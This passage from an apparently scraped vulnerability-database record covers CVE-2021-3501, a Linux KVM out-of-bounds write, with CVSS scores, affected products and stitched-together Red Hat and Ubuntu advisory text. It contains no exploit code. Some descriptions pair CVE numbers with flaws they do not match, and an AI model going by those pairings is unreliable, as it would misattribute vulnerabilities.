{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2326",
"ident": null
},
{
"date": "2020-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-005084",
"ident": null
},
{
"date": "2020-04-28T19:15:12.267000",
"db": "NVD",
"id": "CVE-2020-12243",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-04-29T00:00:00",
"db": "VULHUB",
"id": "VHN-164902",
"ident": null
},
{
"date": "2022-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12243",
"ident": null
},
{
"date": "2022-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2326",
"ident": null
},
{
"date": "2020-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-005084",
"ident": null
},
{
"date": "2024-11-21T04:59:22.057000",
"db": "NVD",
"id": "CVE-2020-12243",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "157602"
},
{
"db": "PACKETSTORM",
"id": "157601"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "OpenLDAP Resource exhaustion vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
}
],
"trust": 0.6
}
}
VAR-202105-0904
Vulnerability from variot - Updated: 2026-04-10 22:39A flaw was found in the Linux kernel in versions before 5.12. The value of internal.ndata, in the KVM API, is mapped to an array index, which can be updated by a user process at anytime which could lead to an out-of-bounds write. The highest threat from this vulnerability is to data integrity and system availability. Linux Kernel Is vulnerable to an out-of-bounds write.Information is tampered with and denial of service (DoS) It may be put into a state. KVM is one of the kernel-based virtual machines. This vulnerability could result in an out-of-bounds write. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana gement_for_kubernetes/2.2/html/release_notes/
Security fixes:
-
redisgraph-tls: redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)
-
console-header-container: nodejs-netmask: improper input validation of octal input data (CVE-2021-28092)
-
console-container: nodejs-is-svg: ReDoS via malicious string (CVE-2021-28918)
Bug fixes:
-
RHACM 2.2.4 images (BZ# 1957254)
-
Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 (BZ#1950832)
-
ACM Operator should support using the default route TLS (BZ# 1955270)
-
The scrolling bar for search filter does not work properly (BZ# 1956852)
-
Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)
-
The proxy setup in install-config.yaml is not worked when IPI installing with RHACM (BZ# 1960181)
-
Unable to make SSH connection to a Bitbucket server (BZ# 1966513)
-
Observability Thanos store shard crashing - cannot unmarshall DNS message (BZ# 1967890)
-
Bugs fixed (https://bugzilla.redhat.com/):
1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data 1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory 1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters 1954535 - Reinstall Submariner - No endpoints found on one cluster 1955270 - ACM Operator should support using the default route TLS 1956852 - The scrolling bar for search filter does not work properly 1957254 - RHACM 2.2.4 images 1959426 - Limits on Length of MultiClusterObservability Resource Name 1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. 1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service" 1966513 - Unable to make SSH connection to a Bitbucket server 1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. 1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.16. See the following advisories for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2287
Space precludes documenting all of the container images in this advisory.
Additional Changes:
This update also fixes several bugs. Documentation for these changes is available from the Release Notes document linked to in the References section. Solution:
For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1889659 - [Assisted-4.6] [cluster validation] Number of hosts validation is not enforced when Automatic role assigned 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1932638 - Removing ssh keys MC does not remove the key from authorized_keys 1934180 - vsphere-problem-detector should check if datastore is part of datastore cluster 1937396 - when kuryr quotas are unlimited, we should not sent alerts 1939014 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP 1939553 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string 1940275 - [IPI Baremetal] Revert Sending full ignition to masters 1942603 - [4.7z] Network policies in ovn-kubernetes don't support external traffic from router when the endpoint publishing strategy is HostNetwork 1944046 - Warn users when using an unsupported browser such as IE 1944575 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results 1945702 - Operator dependency not consistently chosen from default channel 1946682 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall 1947091 - Incorrect skipped status for conditional tasks in the pipeline run 1947427 - Bootstrap ignition shim doesn't follow proxy settings 1948398 - [oVirt] remove ovirt_cafile from ovirt-credentials secret 1949541 - Kuryr-Controller crashes when it's missing the status object 1950290 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation 1951210 - Pod log filename no longer in -.log format 1953475 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc 1954121 - [ceo] [release-4.7] Operator goes degraded when a second internal node ip is added after install 1955210 - OCP 4.6 Build fails when filename contains an umlaut 1955418 - 4.8 -> 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator 1955482 - [4.7] Drop high-cardinality metrics from kube-state-metrics which aren't used 1955600 - e2e unidling test flakes in CI 1956565 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry 1956980 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. 1957308 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-> Removed-> Managed in configs.imageregistry with high ratio 1957499 - OperatorHub - console accepts any value for "Infrastructure features" annotation 1958416 - openshift-oauth-apiserver apiserver pod crashloopbackoffs 1958467 - [4.7] Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct 1958873 - Device Replacemet UI, The status of the disk is "replacement ready" before I clicked on "start replacement" 1959546 - [4.7] storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions 1959737 - Unable to assign nodes for EgressIP even if the egress-assignable label is set 1960093 - Console not works well against a proxy in front of openshift clusters 1960111 - Port 8080 of oVirt CSI driver is causing collisions with other services 1960542 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960544 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console 1960562 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960589 - manifests: extra "spec.version" in console quickstarts makes CVO hotloop 1960645 - [Backport 4.7] Add virt_platform metric to the collected metrics 1960686 - GlobalConfigPage is constantly requesting resources 1961069 - CMO end-to-end tests work only on AWS 1961367 - Conformance tests for OpenStack require the Cinder client that is not included in the "tests" image 1961518 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1961557 - [release-4.7] respect the shutdown-delay-duration from OpenShiftAPIServerConfig 1961719 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop 1961887 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns 1962314 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true 1962493 - Kebab menu of taskrun contains Edit options which should not be present 1962637 - Nodes tainted after configuring additional host iface 1962819 - OCP v4.7 installation with OVN-Kubernetes fails with error "egress bandwidth restriction -1 is not equals" 1962949 - e2e-metal-ipi and related jobs fail to bootstrap due to multipe VIP's 1963141 - packageserver clusteroperator Available condition set to false on any Deployment spec change 1963243 - HAproxy pod logs showing error "another server named 'pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080' was already defined at line 326, please use distinct names" 1964322 - UI, The status of "Used Capacity Breakdown [Pods]" is "Not available" 1964568 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation 1965075 - [4.7z] After upgrade from 4.5.16 to 4.6.17, customer's application is seeing re-transmits 1965932 - [oauth-server] bump k8s.io/apiserver to 1.20.3 1966358 - Build failure on s390x 1966798 - [tests] Release 4.7 broken due to the usage of wrong OCS version 1966810 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration 1967328 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud 1967966 - prometheus-k8s pods can't be scheduled due to volume node affinity conflict 1967972 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews 1970322 - [OVN]EgressFirewall doesn't work well as expected
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat Virtualization Host security update [ovirt-4.4.6] Advisory ID: RHSA-2021:2522-01 Product: Red Hat Virtualization Advisory URL: https://access.redhat.com/errata/RHSA-2021:2522 Issue date: 2021-06-22 CVE Names: CVE-2020-24489 CVE-2021-3501 CVE-2021-3560 CVE-2021-27219 =====================================================================
- Summary:
An update for imgbased, redhat-release-virtualization-host, and redhat-virtualization-host is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64 Red Hat Virtualization 4 Hypervisor for RHEL 8 - x86_64
- Description:
The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
Security Fix(es):
-
glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits (CVE-2021-27219)
-
kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run (CVE-2021-3501)
-
polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)
-
hw: vt-d related privilege escalation (CVE-2020-24489)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
Previously, systemtap dependencies were not included in the RHV-H channel. Therefore, systemtap could not be installed. In this release, the systemtap dependencies have been included in the channel, resolving the issue. (BZ#1903997)
-
Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/2974891
- Bugs fixed (https://bugzilla.redhat.com/):
1903997 - Provide systemtap dependencies within RHV-H channel 1929858 - CVE-2021-27219 glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits 1950136 - CVE-2021-3501 kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run 1961710 - CVE-2021-3560 polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() 1962650 - CVE-2020-24489 hw: vt-d related privilege escalation
- Package List:
Red Hat Virtualization 4 Hypervisor for RHEL 8:
Source: redhat-virtualization-host-4.4.6-20210615.0.el8_4.src.rpm
x86_64: redhat-virtualization-host-image-update-4.4.6-20210615.0.el8_4.x86_64.rpm
RHEL 8-based RHEV-H for RHEV 4 (build requirements):
Source: redhat-release-virtualization-host-4.4.6-2.el8ev.src.rpm
noarch: redhat-virtualization-host-image-update-placeholder-4.4.6-2.el8ev.noarch.rpm
x86_64: redhat-release-virtualization-host-4.4.6-2.el8ev.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-24489 https://access.redhat.com/security/cve/CVE-2021-3501 https://access.redhat.com/security/cve/CVE-2021-3560 https://access.redhat.com/security/cve/CVE-2021-27219 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYNH6EtzjgjWX9erEAQg8rBAApw3Jn/EPQosAw8RDA053A4aCxO2gHC15 HK1kJ2gSn73kahmvvl3ZAFQW3Wa/OKZRFnbOKZPcJvKeVKnmeHdjmX6V/wNC/bAO i2bc69+GYd+mj3+ngKmTyFFVSsgDWCfFv6lwMl74d0dXYauCfMTiMD/K/06zaQ3b arTdExk9VynIcr19ggOfhGWAe5qX8ZXfPHwRAmDBNZCUjzWm+c+O+gQQiy/wWzMB 6vbtEqKeXfT1XgxjdQO5xfQ4Fvd8ssKXwOjdymCsEoejplVFmO3reBrl+y95P3p9 BCKR6/cWKzhaAXfS8jOlZJvxA0TyxK5+HOP8pGWGfxBixXVbaFR4E/+rnA1E04jp lGXvby0yq1Q3u4/dYKPn7oai1H7b7TOaCKrmTMy3Nwd5mKiT+CqYk2Va0r2+Cy/2 jH6CeaSKJIBFviUalmc7ZbdPR1zfa1LEujaYp8aCez8pNF0Mopf5ThlCwlZdEdxG aTK1VPajNj2i8oveRPgNAzIu7tMh5Cibyo92nkfjhV9ube7WLg4fBKbX/ZfCBS9y osA4oRWUFbJYnHK6Fbr1X3mIYIq0s2y0MO2QZWj8hvzMT+BcQy5byreU4Y6o8ikl hXz6yl7Cu6X7wm32QZNZMWbUwJfksJRBR+dfkhDcGV0/zQpMZpwHDXs06kal9vsY DRQj4fNuEQo= =bDgd -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Bug Fix(es):
-
kernel-rt: update RT source tree to the RHEL-8.4.z0 source tree (BZ#1957489)
-
Description:
This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. 8) - aarch64, noarch, ppc64le, s390x, x86_64
Bug Fix(es):
-
OVS mistakenly using local IP as tun_dst for VXLAN packets (?) (BZ#1944667)
-
Selinux: The task calling security_set_bools() deadlocks with itself when it later calls selinux_audit_rule_match(). (BZ#1945123)
-
[mlx5] tc flower mpls match options does not work (BZ#1952061)
-
mlx5: missing patches for ct.rel (BZ#1952062)
-
CT HWOL: with OVN/OVS, intermittently, load balancer hairpin TCP packets get dropped for seconds in a row (BZ#1952065)
-
[Lenovo 8.3 bug] Blackscreen after clicking on "Settings" icon from top-right corner. (BZ#1952900)
-
RHEL 8.x missing uio upstream fix. (BZ#1952952)
-
Turbostat doesn't show any measured data on AMD Milan (BZ#1952987)
-
P620 no sound from front headset jack (BZ#1954545)
-
RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. (BZ#1955188)
-
[net/sched] connection failed with DNAT + SNAT by tc action ct (BZ#1956458)
-
========================================================================== Ubuntu Security Notice USN-4983-1 June 03, 2021
linux-oem-5.10 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.04 LTS
Summary:
Several security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)
Piotr Krysiuk and Benedict Schlueter discovered that the eBPF implementation in the Linux kernel performed out of bounds speculation on pointer arithmetic. A local attacker could use this to expose sensitive information. (CVE-2021-29155)
Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3501)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.04 LTS: linux-image-5.10.0-1029-oem 5.10.0-1029.30 linux-image-oem-20.04 5.10.0.1029.30 linux-image-oem-20.04b 5.10.0.1029.30
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "virtualization host",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time for nfv",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "red hat enterprise linux",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "163188"
},
{
"db": "PACKETSTORM",
"id": "163149"
},
{
"db": "PACKETSTORM",
"id": "163242"
},
{
"db": "PACKETSTORM",
"id": "162881"
},
{
"db": "PACKETSTORM",
"id": "162882"
},
{
"db": "PACKETSTORM",
"id": "162890"
}
],
"trust": 0.6
},
"cve": "CVE-2021-3501",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 3.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2021-3501",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 3.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "VHN-391161",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:N/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2021-3501",
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.1,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-3501",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-3501",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-3501",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202105-271",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-391161",
"trust": 0.1,
"value": "LOW"
},
{
"author": "VULMON",
"id": "CVE-2021-3501",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"description": {
"_id": null,
"data": "A flaw was found in the Linux kernel in versions before 5.12. The value of internal.ndata, in the KVM API, is mapped to an array index, which can be updated by a user process at anytime which could lead to an out-of-bounds write. The highest threat from this vulnerability is to data integrity and system availability. Linux Kernel Is vulnerable to an out-of-bounds write.Information is tampered with and denial of service (DoS) It may be put into a state. KVM is one of the kernel-based virtual machines. This vulnerability could result in an out-of-bounds write. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.2.4 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability\nengineers face as they work across a range of public and private cloud\nenvironments. \nClusters and applications are all visible and managed from a single\nconsole\u2014with security policy built in. See\nthe following Release Notes documentation, which will be updated shortly\nfor\nthis release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.2/html/release_notes/\n\nSecurity fixes:\n\n* redisgraph-tls: redis: integer overflow when configurable limit for\nmaximum supported bulk input size is too big on 32-bit platforms\n(CVE-2021-21309)\n\n* console-header-container: nodejs-netmask: improper input validation of\noctal input data (CVE-2021-28092)\n\n* console-container: nodejs-is-svg: ReDoS via malicious string\n(CVE-2021-28918)\n\nBug fixes: \n\n* RHACM 2.2.4 images (BZ# 1957254)\n\n* Enabling observability for OpenShift Container Storage with RHACM 2.2 on\nOCP 4.7 (BZ#1950832)\n\n* ACM Operator should support using the default route TLS (BZ# 1955270)\n\n* The scrolling bar for search filter does not work properly (BZ# 1956852)\n\n* Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)\n\n* The proxy setup in install-config.yaml is not worked when IPI installing\nwith RHACM (BZ# 1960181)\n\n* Unable to make SSH connection to a Bitbucket server (BZ# 1966513)\n\n* Observability Thanos store shard crashing - cannot unmarshall DNS message\n(BZ# 1967890)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data\n1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7\n1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory\n1954506 - [DDF] Table does not contain data about 20 clusters. Now it\u0027s difficult to estimate CPU usage with larger clusters\n1954535 - Reinstall Submariner - No endpoints found on one cluster\n1955270 - ACM Operator should support using the default route TLS\n1956852 - The scrolling bar for search filter does not work properly\n1957254 - RHACM 2.2.4 images\n1959426 - Limits on Length of MultiClusterObservability Resource Name\n1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. \n1963128 - [DDF] Please rename this to \"Amazon Elastic Kubernetes Service\"\n1966513 - Unable to make SSH connection to a Bitbucket server\n1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. \n1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message\n\n5. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.16. See the following advisories for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2287\n\nSpace precludes documenting all of the container images in this advisory. \n\nAdditional Changes:\n\nThis update also fixes several bugs. Documentation for these changes is\navailable from the Release Notes document linked to in the References\nsection. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1889659 - [Assisted-4.6] [cluster validation] Number of hosts validation is not enforced when Automatic role assigned\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1932638 - Removing ssh keys MC does not remove the key from authorized_keys\n1934180 - vsphere-problem-detector should check if datastore is part of datastore cluster\n1937396 - when kuryr quotas are unlimited, we should not sent alerts\n1939014 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP\n1939553 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string\n1940275 - [IPI Baremetal] Revert Sending full ignition to masters\n1942603 - [4.7z] Network policies in ovn-kubernetes don\u0027t support external traffic from router when the endpoint publishing strategy is HostNetwork\n1944046 - Warn users when using an unsupported browser such as IE\n1944575 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results\n1945702 - Operator dependency not consistently chosen from default channel\n1946682 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall\n1947091 - Incorrect skipped status for conditional tasks in the pipeline run\n1947427 - Bootstrap ignition shim doesn\u0027t follow proxy settings\n1948398 - [oVirt] remove ovirt_cafile from ovirt-credentials secret\n1949541 - Kuryr-Controller crashes when it\u0027s missing the status object\n1950290 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation\n1951210 - Pod log filename no longer in \u003cpod-name\u003e-\u003ccontainer-name\u003e.log format\n1953475 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc\n1954121 - [ceo] [release-4.7] Operator goes degraded when a second internal node ip is added after install\n1955210 - OCP 4.6 Build fails when filename contains an umlaut\n1955418 - 4.8 -\u003e 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator\n1955482 - [4.7] Drop high-cardinality 